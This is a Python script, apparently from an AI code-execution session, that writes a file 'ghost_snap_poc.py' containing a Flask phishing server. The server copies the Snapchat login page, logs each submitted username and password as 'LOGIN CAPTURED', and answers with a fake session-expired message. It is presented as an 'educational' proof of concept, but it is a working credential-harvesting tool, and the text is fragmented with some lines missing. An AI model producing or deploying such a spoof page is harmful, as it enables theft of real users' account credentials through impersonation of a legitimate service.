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Define output directory and file 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output_dir = Path("/mnt/data/")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filename = "ghost_snap_poc.py"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Simulated Snapchat PoC for login spoof and ephemeral trust bypass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snapchat_poc =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\"\"\"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GHOST.SNAP.011 — Ephemeral Trust Degradation Vector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Proof of Concept by GhostCore //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This script simulates a Snapchat-style login spoof and ephemeral session trust exploit.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Educational use only.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\"\"\"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flask import Flask, request, render_template_string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Simulated login UI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login_page = '''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&lt;title&gt;Snapchat Login&lt;/title&gt;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&lt;h2 style="font-family:sans-serif;"&gt;Login to Snapchat&lt;/h2&gt;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&lt;form method="post"&gt;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&lt;input name="username" placeholder="Username" required&gt;&lt;br&gt;&lt;br&gt;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&lt;input name="password" placeholder="Password" type="password" required&gt;&lt;br&gt;&lt;br&gt;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&lt;button type="submit"&gt;Log In&lt;/button&gt;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Route to simulate login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@app.route('/', methods=['GET', 'POST'])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def login():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request.method == 'POST':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user = request.form.get('username')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pwd = request.form.get('password')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timestamp = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime())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logging.info(f"[+] LOGIN CAPTURED :: {user} / {pwd} @ {timestamp}")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"&lt;h3&gt;Snapchat session expired. Please refresh.&lt;/h3&gt;"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return render_template_string(login_page)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Run local server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print("== GHOST.SNAP.011 :: Snapchat Login Spoof Server Running ==")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print("Access it at http://localhost:5000")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Write to file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file_path = output_dir / filename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file_path.write_text(snapchat_poc)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file_path.name  # Return just the filename to confirm creation.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